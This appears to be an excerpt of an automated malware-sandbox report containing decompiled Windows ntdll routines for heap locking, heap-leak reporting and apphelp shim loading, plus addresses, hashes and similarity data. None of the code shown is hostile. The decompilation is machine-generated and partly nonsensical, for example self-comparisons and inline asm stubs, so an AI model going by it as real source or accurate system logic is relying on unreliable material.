                                                                                                                                                                            				_v12 = 0xffff;
                                                                                                                                                                            				if(_t65 != 0xfffffffe) {
                                                                                                                                                                            					if(( *_t87 & 0x00000001) != 0) {
                                                                                                                                                                            						E1D8BAA40(_t92);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t72 =  *((intOrPtr*)(_t92 + 0x10));
                                                                                                                                                                            					_v8 = _t72;
                                                                                                                                                                            					if(_t72 == 0) {
                                                                                                                                                                            						_v8 = E1D84FEC0(_t92);
                                                                                                                                                                            					}
                                                                                                                                                                            					_v16 = _v16 & 0x00000000;
                                                                                                                                                                            					_t95 = _t92 + 4;
                                                                                                                                                                            					_t73 = _v12;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t90 = _t73 & 0x00000002 | 0x00000001;
                                                                                                                                                                            						_t82 = _t90 + _t73;
                                                                                                                                                                            						asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                            						if(_t73 == _t73) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						E1D84BAC0(_t82,  &_v16);
                                                                                                                                                                            						_t73 =  *_t95;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t93 = _a4;
                                                                                                                                                                            					_t74 = _v8;
                                                                                                                                                                            					if((_t90 & 0x00000002) != 0) {
                                                                                                                                                                            						E1D84F300(_t92, _t74);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L6;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x1d84da2a
                                                                                                                                                                            0x1d84da35
                                                                                                                                                                            0x1d88f408
                                                                                                                                                                            0x1d84da90
                                                                                                                                                                            0x1d84da96
                                                                                                                                                                            0x1d84da9b
                                                                                                                                                                            0x1d88f510
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f51f
                                                                                                                                                                            0x1d84daa6
                                                                                                                                                                            0x1d84daa9
                                                                                                                                                                            0x1d88f537
                                                                                                                                                                            0x1d88f53f
                                                                                                                                                                            0x1d88f53f
                                                                                                                                                                            0x1d88f537
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84daaf
                                                                                                                                                                            0x1d84daa1
                                                                                                                                                                            0x1d84daa1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84daa1
                                                                                                                                                                            0x1d84da42
                                                                                                                                                                            0x1d88f413
                                                                                                                                                                            0x1d88f41b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f421
                                                                                                                                                                            0x1d84da4f
                                                                                                                                                                            0x1d88f432
                                                                                                                                                                            0x1d88f451
                                                                                                                                                                            0x1d88f456
                                                                                                                                                                            0x1d88f434
                                                                                                                                                                            0x1d88f449
                                                                                                                                                                            0x1d88f44e
                                                                                                                                                                            0x1d88f462
                                                                                                                                                                            0x1d88f471
                                                                                                                                                                            0x1d88f476
                                                                                                                                                                            0x1d88f47b
                                                                                                                                                                            0x1d88f48d
                                                                                                                                                                            0x1d88f48f
                                                                                                                                                                            0x1d88f496
                                                                                                                                                                            0x1d88f497
                                                                                                                                                                            0x1d88f497
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f49e
                                                                                                                                                                            0x1d84da59
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84da5b
                                                                                                                                                                            0x1d84da66
                                                                                                                                                                            0x1d84da6d
                                                                                                                                                                            0x1d84da6d
                                                                                                                                                                            0x1d84da71
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84da73
                                                                                                                                                                            0x1d84da77
                                                                                                                                                                            0x1d84da7f
                                                                                                                                                                            0x1d84da80
                                                                                                                                                                            0x1d84da84
                                                                                                                                                                            0x1d84da8a
                                                                                                                                                                            0x1d88f4a8
                                                                                                                                                                            0x1d88f4ab
                                                                                                                                                                            0x1d88f4ab
                                                                                                                                                                            0x1d88f4b0
                                                                                                                                                                            0x1d88f4b3
                                                                                                                                                                            0x1d88f4b8
                                                                                                                                                                            0x1d88f4c1
                                                                                                                                                                            0x1d88f4c1
                                                                                                                                                                            0x1d88f4c4
                                                                                                                                                                            0x1d88f4c8
                                                                                                                                                                            0x1d88f4cb
                                                                                                                                                                            0x1d88f4ce
                                                                                                                                                                            0x1d88f4d5
                                                                                                                                                                            0x1d88f4d8
                                                                                                                                                                            0x1d88f4db
                                                                                                                                                                            0x1d88f4e1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f4e7
                                                                                                                                                                            0x1d88f4ec
                                                                                                                                                                            0x1d88f4ec
                                                                                                                                                                            0x1d88f4f0
                                                                                                                                                                            0x1d88f4f3
                                                                                                                                                                            0x1d88f4f9
                                                                                                                                                                            0x1d88f503
                                                                                                                                                                            0x1d88f503
                                                                                                                                                                            0x1d88f4f9
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                            • API String ID: 3446177414-3224558752
                                                                                                                                                                            • Opcode ID: 78dc4513fc5a1d15a8767d79513d415766ad12e95deafe1f04b4c3f8249431b3
                                                                                                                                                                            • Instruction ID: 3d465f2b3bcd3f0408f5881fc45f6095b08416305a7fbdec51ee7aa2ad04beec
                                                                                                                                                                            • Opcode Fuzzy Hash: 78dc4513fc5a1d15a8767d79513d415766ad12e95deafe1f04b4c3f8249431b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D413732A09649DFC712CF28C484BAAB3B4FF45764F20C569E6158B392C738B985C793
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • HEAP: , xrefs: 1D8CECDD
                                                                                                                                                                            • Entry Heap Size , xrefs: 1D8CEDED
                                                                                                                                                                            • ---------------------------------------, xrefs: 1D8CEDF9
                                                                                                                                                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D8CEDE3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                            • API String ID: 3446177414-1102453626
                                                                                                                                                                            • Opcode ID: 570c63c1aaac4fc2c0ab530aef8ee4c345fa31d814db79976f3939b714c8b8d5
                                                                                                                                                                            • Instruction ID: dc7d9c1b830c1498f651023680abad681e999c8ea5a643f3074567e959f81ec2
                                                                                                                                                                            • Opcode Fuzzy Hash: 570c63c1aaac4fc2c0ab530aef8ee4c345fa31d814db79976f3939b714c8b8d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 7841F335A04225DFC702CF18C580AA9BBF5FF493A072681ADE5189F360D731ED42CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                            			E1D84DAC0(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                            				char _v5;
                                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                                            				char* _t26;
                                                                                                                                                                            				char _t28;
                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                            
                                                                                                                                                                            				_t53 = _a4;
                                                                                                                                                                            				_v5 = 0xff;
                                                                                                                                                                            				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
                                                                                                                                                                            					E1D8E9109(_t53,  &_v5);
                                                                                                                                                                            					L5:
                                                                                                                                                                            					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                            					if(_t25 != 0) {
                                                                                                                                                                            						if( *_t25 == 0) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                            						L7:
                                                                                                                                                                            						if( *_t26 != 0) {
                                                                                                                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                            								E1D8DF2AE(_t53);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                            						L9:
                                                                                                                                                                            						return _t28;
                                                                                                                                                                            					}
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t26 = 0x7ffe0380;
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                            					_t55 =  *0x1d913768; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(_t53);
                                                                                                                                                                            					_t28 =  *_t55();
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
                                                                                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                                                            						_push("HEAP: ");
                                                                                                                                                                            						E1D81B910();
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D81B910("Invalid heap signature for heap at %p", _t53);
                                                                                                                                                                            					E1D81B910(", passed to %s", "RtlLockHeap");
                                                                                                                                                                            					_push("\n");
                                                                                                                                                                            					E1D81B910();
                                                                                                                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                                                                            						 *0x1d9147a1 = 1;
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						 *0x1d9147a1 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t28 = 0;
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                                            						E1D82FED0( *((intOrPtr*)(_t53 + 0xc8)));
                                                                                                                                                                            						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            			}









                                                                                                                                                                            0x1d84dac8
                                                                                                                                                                            0x1d84dacb
                                                                                                                                                                            0x1d84dad6
                                                                                                                                                                            0x1d88f54e
                                                                                                                                                                            0x1d84db0e
                                                                                                                                                                            0x1d84db14
                                                                                                                                                                            0x1d84db19
                                                                                                                                                                            0x1d88f5ee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f5fd
                                                                                                                                                                            0x1d84db24
                                                                                                                                                                            0x1d84db27
                                                                                                                                                                            0x1d88f614
                                                                                                                                                                            0x1d88f61c
                                                                                                                                                                            0x1d88f61c
                                                                                                                                                                            0x1d88f614
                                                                                                                                                                            0x1d84db2d
                                                                                                                                                                            0x1d84db2f
                                                                                                                                                                            0x1d84db31
                                                                                                                                                                            0x1d84db31
                                                                                                                                                                            0x1d84db1f
                                                                                                                                                                            0x1d84db1f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84db1f
                                                                                                                                                                            0x1d84dae3
                                                                                                                                                                            0x1d88f559
                                                                                                                                                                            0x1d88f561
                                                                                                                                                                            0x1d88f567
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f567
                                                                                                                                                                            0x1d84daf0
                                                                                                                                                                            0x1d88f578
                                                                                                                                                                            0x1d88f597
                                                                                                                                                                            0x1d88f59c
                                                                                                                                                                            0x1d88f57a
                                                                                                                                                                            0x1d88f58f
                                                                                                                                                                            0x1d88f594
                                                                                                                                                                            0x1d88f5a8
                                                                                                                                                                            0x1d88f5b7
                                                                                                                                                                            0x1d88f5bc
                                                                                                                                                                            0x1d88f5c1
                                                                                                                                                                            0x1d88f5d3
                                                                                                                                                                            0x1d88f5d5
                                                                                                                                                                            0x1d88f5dc
                                                                                                                                                                            0x1d88f5dd
                                                                                                                                                                            0x1d88f5dd
                                                                                                                                                                            0x1d88f5e4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84daf6
                                                                                                                                                                            0x1d84dafa
                                                                                                                                                                            0x1d84db02
                                                                                                                                                                            0x1d84db07
                                                                                                                                                                            0x1d84db07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84dafa

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                            • API String ID: 3446177414-1222099010
                                                                                                                                                                            • Opcode ID: 68ab53f8e369325f46f404804e6ab4be1c1890fb30dc6dd20b2b02422c280604
                                                                                                                                                                            • Instruction ID: 73c958defef988b2e172b021aab08fa8a0164b3b77212442aeb5a3a823ded96e
                                                                                                                                                                            • Opcode Fuzzy Hash: 68ab53f8e369325f46f404804e6ab4be1c1890fb30dc6dd20b2b02422c280604
                                                                                                                                                                            • Instruction Fuzzy Hash: 51313536208688DFD722CF2CC808BA977A4FF05B70F128585F5128B7A2CB68B944C713
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                                                            			E1D84237A(intOrPtr* __ecx, void* __edx) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                            				signed char _t36;
                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				void* _t48;
                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                            				intOrPtr* _t51;
                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            
                                                                                                                                                                            				_t38 =  *0x1d9138b8; // 0x1
                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_t55 = 0;
                                                                                                                                                                            				if(_t38 == 0) {
                                                                                                                                                                            					L2:
                                                                                                                                                                            					if(_t38 == 1) {
                                                                                                                                                                            						_t22 =  *0x1d9168d8; // 0x0
                                                                                                                                                                            						if(_t22 != 0) {
                                                                                                                                                                            							E1D833BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
                                                                                                                                                                            							 *0x1d9168d8 = _t50;
                                                                                                                                                                            							 *0x1d915d4c = _t50;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x1d9138b8 = _t38;
                                                                                                                                                                            					return _t55;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t59 =  *0x1d9168d8 - _t55; // 0x0
                                                                                                                                                                            				if(_t59 != 0) {
                                                                                                                                                                            					 *0x1d9138b8 = 0;
                                                                                                                                                                            					_t55 = E1D8A1BB6(_t38,  &_v8);
                                                                                                                                                                            					if(_t55 >= 0) {
                                                                                                                                                                            						_t51 =  *0x1d9168d8; // 0x0
                                                                                                                                                                            						while( *_t51 != 0) {
                                                                                                                                                                            							 *0x1d9191e0(_t51, 0, 1, 1, 0, 1, 0x10);
                                                                                                                                                                            							_v8();
                                                                                                                                                                            							if(0 == 0) {
                                                                                                                                                                            								_t55 = 0xc0000142;
                                                                                                                                                                            								L21:
                                                                                                                                                                            								_t50 = 0;
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t42 = _t51;
                                                                                                                                                                            							_t10 = _t42 + 2; // 0x2
                                                                                                                                                                            							_t48 = _t10;
                                                                                                                                                                            							do {
                                                                                                                                                                            								_t29 =  *_t42;
                                                                                                                                                                            								_t42 = _t42 + 2;
                                                                                                                                                                            							} while (_t29 != _v12);
                                                                                                                                                                            							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t30 =  *0x7ffe0330;
                                                                                                                                                                            						_t53 =  *0x1d919218; // 0x0
                                                                                                                                                                            						_v12 = _t30;
                                                                                                                                                                            						_t45 = 0x20;
                                                                                                                                                                            						_t46 = _t45 - (_t30 & 0x0000001f);
                                                                                                                                                                            						asm("ror edi, cl");
                                                                                                                                                                            						E1D82FED0(0x1d9132d8);
                                                                                                                                                                            						if( *0x1d9165f4 < 3) {
                                                                                                                                                                            							_t46 = _v16;
                                                                                                                                                                            							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
                                                                                                                                                                            								E1D816704(_t46, _t53 ^ _v12);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0x1d9132d8);
                                                                                                                                                                            						E1D82E740(_t46);
                                                                                                                                                                            						goto L21;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t36 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            					if((_t36 & 0x00000003) != 0) {
                                                                                                                                                                            						E1D89E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
                                                                                                                                                                            						_t36 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            					}
                                                                                                                                                                            					if((_t36 & 0x00000010) != 0) {
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            					}
                                                                                                                                                                            					_t55 = _t50;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L2;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x1d842383
                                                                                                                                                                            0x1d84238b
                                                                                                                                                                            0x1d84238d
                                                                                                                                                                            0x1d842390
                                                                                                                                                                            0x1d842393
                                                                                                                                                                            0x1d842397
                                                                                                                                                                            0x1d8423a5
                                                                                                                                                                            0x1d8423a8
                                                                                                                                                                            0x1d8423aa
                                                                                                                                                                            0x1d8423b1
                                                                                                                                                                            0x1d88a878
                                                                                                                                                                            0x1d88a87d
                                                                                                                                                                            0x1d88a883
                                                                                                                                                                            0x1d88a883
                                                                                                                                                                            0x1d8423b1
                                                                                                                                                                            0x1d8423ba
                                                                                                                                                                            0x1d8423c3
                                                                                                                                                                            0x1d8423c3
                                                                                                                                                                            0x1d842399
                                                                                                                                                                            0x1d84239f
                                                                                                                                                                            0x1d88a784
                                                                                                                                                                            0x1d88a78f
                                                                                                                                                                            0x1d88a793
                                                                                                                                                                            0x1d88a7cd
                                                                                                                                                                            0x1d88a80b
                                                                                                                                                                            0x1d88a7e3
                                                                                                                                                                            0x1d88a7e9
                                                                                                                                                                            0x1d88a7ee
                                                                                                                                                                            0x1d88a866
                                                                                                                                                                            0x1d88a85f
                                                                                                                                                                            0x1d88a85f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88a85f
                                                                                                                                                                            0x1d88a7f0
                                                                                                                                                                            0x1d88a7f2
                                                                                                                                                                            0x1d88a7f2
                                                                                                                                                                            0x1d88a7f5
                                                                                                                                                                            0x1d88a7f5
                                                                                                                                                                            0x1d88a7f8
                                                                                                                                                                            0x1d88a7fb
                                                                                                                                                                            0x1d88a808
                                                                                                                                                                            0x1d88a808
                                                                                                                                                                            0x1d88a812
                                                                                                                                                                            0x1d88a817
                                                                                                                                                                            0x1d88a81f
                                                                                                                                                                            0x1d88a825
                                                                                                                                                                            0x1d88a826
                                                                                                                                                                            0x1d88a82d
                                                                                                                                                                            0x1d88a82f
                                                                                                                                                                            0x1d88a83b
                                                                                                                                                                            0x1d88a83d
                                                                                                                                                                            0x1d88a849
                                                                                                                                                                            0x1d88a850
                                                                                                                                                                            0x1d88a850
                                                                                                                                                                            0x1d88a849
                                                                                                                                                                            0x1d88a855
                                                                                                                                                                            0x1d88a85a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88a85a
                                                                                                                                                                            0x1d88a795
                                                                                                                                                                            0x1d88a79c
                                                                                                                                                                            0x1d88a7b4
                                                                                                                                                                            0x1d88a7b9
                                                                                                                                                                            0x1d88a7be
                                                                                                                                                                            0x1d88a7c3
                                                                                                                                                                            0x1d88a7c5
                                                                                                                                                                            0x1d88a7c5
                                                                                                                                                                            0x1d88a7c6
                                                                                                                                                                            0x1d88a7c6
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            • apphelp.dll, xrefs: 1D842382
                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 1D88A7A5
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D88A7AF
                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D88A79F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                                                            • Opcode ID: e709583e15d88ded331b642e3c671fa9fa796c89cef082caa1af224266448910
                                                                                                                                                                            • Instruction ID: 9aa243c739a35982304f8600cd8633279873d8bdbe1715678cb232678f3ae05e
                                                                                                                                                                            • Opcode Fuzzy Hash: e709583e15d88ded331b642e3c671fa9fa796c89cef082caa1af224266448910
                                                                                                                                                                            • Instruction Fuzzy Hash: B8319E76E08255EFD7119F59CCC0F6BBBB4FB80B64F114059F9246B292D770A841CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                            			E1D840AEB(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                            				signed char _t101;
                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                            				void* _t108;
                                                                                                                                                                            				void* _t111;
                                                                                                                                                                            				signed int _t113;
                                                                                                                                                                            				intOrPtr* _t117;
                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                            				intOrPtr* _t120;
                                                                                                                                                                            				signed int _t121;
                                                                                                                                                                            				intOrPtr* _t122;
                                                                                                                                                                            				signed int _t126;
                                                                                                                                                                            				void* _t130;
                                                                                                                                                                            				void* _t131;
                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                            				signed int _t134;
                                                                                                                                                                            				signed int _t135;
                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                            				signed int _t137;
                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                            				void* _t139;
                                                                                                                                                                            				void* _t140;
                                                                                                                                                                            				void* _t141;
                                                                                                                                                                            
                                                                                                                                                                            				_t134 = 0;
                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				_t141 =  *0x1d9168d8 - _t134; // 0x0
                                                                                                                                                                            				if(_t141 != 0) {
                                                                                                                                                                            					_v20 = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1d9165f9 == 0) {
                                                                                                                                                                            					_t136 =  *((intOrPtr*)(_t108 + 4));
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						__eflags = _t136 - _t108;
                                                                                                                                                                            						if(_t136 == _t108) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t110 = _t136 - 0x54;
                                                                                                                                                                            						E1D857550(_t136 - 0x54);
                                                                                                                                                                            						_t136 =  *((intOrPtr*)(_t136 + 4));
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L2;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L2:
                                                                                                                                                                            					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                                                                                                                                                                            					E1D82FED0(0x1d9132d8);
                                                                                                                                                                            					if( *0x1d9165f0 != 0) {
                                                                                                                                                                            						_t126 =  *0x7ffe0330;
                                                                                                                                                                            						_t135 =  *0x1d919218; // 0x0
                                                                                                                                                                            						_t111 = 0x20;
                                                                                                                                                                            						_t110 = _t111 - (_t126 & 0x0000001f);
                                                                                                                                                                            						asm("ror edi, cl");
                                                                                                                                                                            						_t134 = _t135 ^ _t126;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t137 = 0;
                                                                                                                                                                            					_t67 =  *((intOrPtr*)(_t108 + 4));
                                                                                                                                                                            					_v36 = 0;
                                                                                                                                                                            					_v32 = _t67;
                                                                                                                                                                            					if(_t67 == _t108) {
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_push(0x1d9132d8);
                                                                                                                                                                            						E1D82E740(_t110);
                                                                                                                                                                            						return _t137;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t113 = _v16 & 0x00000100;
                                                                                                                                                                            						_v16 = _t113;
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t138 = _t67 - 0x54;
                                                                                                                                                                            							if(_t113 != 0) {
                                                                                                                                                                            								_t110 = _t138;
                                                                                                                                                                            								_t70 = E1D816DA6(_t138);
                                                                                                                                                                            								_v36 = _t70;
                                                                                                                                                                            								__eflags = _t70;
                                                                                                                                                                            								if(_t70 < 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t114 = _t138;
                                                                                                                                                                            							E1D8298DE(_t138, 0);
                                                                                                                                                                            							if(_t134 != 0) {
                                                                                                                                                                            								__eflags =  *0x1d9165f8;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									_t114 = _t134;
                                                                                                                                                                            									 *0x1d9191e0(_t138);
                                                                                                                                                                            									 *_t134();
                                                                                                                                                                            									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t148 = _v20;
                                                                                                                                                                            							if(_v20 == 0) {
                                                                                                                                                                            								_t76 =  *(_t138 + 0x28);
                                                                                                                                                                            								_t114 = _t76;
                                                                                                                                                                            								_t130 = 0x10;
